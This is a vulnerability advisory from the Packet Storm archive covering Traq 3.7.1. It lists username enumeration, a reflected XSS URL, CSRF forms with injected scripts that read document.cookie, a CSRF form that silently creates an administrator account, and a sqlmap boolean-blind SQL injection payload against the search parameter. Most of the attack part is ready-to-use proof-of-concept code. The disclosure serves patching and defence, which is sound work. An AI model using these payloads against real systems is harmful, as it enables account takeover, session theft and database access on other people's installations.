what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Traq 3.7.1 CSRF / XSS / SQL Injection

Traq 3.7.1 CSRF / XSS / SQL Injection
Posted Oct 22, 2018
Authored by Matt Landers

Traq version 3.7.1 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
SHA-256 | 90163177fcd7c49846b2591aec6aaee313e7e0cf8993783867ab251013db39d4

Traq 3.7.1 CSRF / XSS / SQL Injection

Change Mirror Download
=================================================

Synopsis: Traq vulnerable to XSS, Admin account creation CSRF, SQL Injection, Lack of session timeout.
Product: Traq
Version: 3.7.1
Vendor site: https://traq.io/
Researcher: Matt Landers
matt@mjlanders.com
twitter.com/matthewjland
https://mjlanders.org/

=================================================

1: Username enumeration via
http://example.com/home/example/public_html/traq/users/1 = admin
http://example.com/home/example/public_html/traq/users/2 = anonymous
http://example.com/home/example/public_html/traq/users/3 = user etc etc


2: Reflected XSS
A GET reflected XSS appears in the search parameter of the following request.
https://example.com/traq/tickets?search="><Script>alert(document.domain)</Script>


3: CSRF - XSS
This was a post XSS combined with a csrf vulnerability in the email parameter in the following request.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/home/public_html/traq/usercp" method="POST">
<input type="hidden" name="name" value="Administrator" />
<input type="hidden" name="email" value="�tt1kr"><img src=a onerror=alert(document.cookie)>awezh" />
<input type="hidden" name="watch_created_tickets" value="1" />
<input type="hidden" name="locale" value="enus" />
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


4: CSRF - XSS
This was a post XSS combined with a csrf vulnerability in the name and email parameter in the following request.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/home/public_html/traq/admin/users/new?overlay=true" method="POST">
<input type="hidden" name="username" value="user1" />
<input type="hidden" name="name" value="guyj"><img src=a onerror=alert(document.domain)>mztcr" />
<input type="hidden" name="password" value="userpass" />
<input type="hidden" name="email" value="test@testy2.comlgfyr"><img src=a onerror=alert(document.cookie)>jj194" />
<input type="hidden" name="group_id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

5: Admin user creation via CSRF in the same request as the above mentioned item 4. The xss could be used to notify the attacker when the admin triggers the csrf, the admin account is created by setting the group id to 1 in this request.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/home/public_html/traq/admin/users/new?overlay=true" method="POST">
<input type="hidden" name="username" value="testadmin" />
<input type="hidden" name="name" value="guy smiley" />
<input type="hidden" name="password" value="testadmin" />
<input type="hidden" name="email" value="testadmin@evil.com" />
<input type="hidden" name="group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

6: SQL Injection via the search parameter, I was able to have sqlmap return with the database current user and database type. The following is the sql injection I used in order to achieve this.

Parameter: search (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://example.com:80/home/example/public_html/traq/dfgdfg/tickets?search=') RLIKE (SELECT (CASE WHEN (6383=6383) THEN '' ELSE 0x28 END)) AND ('yDch'='yDch&order_by=component.asc


7: There appears to be no session timeout, admin account stayed logged in for two days.
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close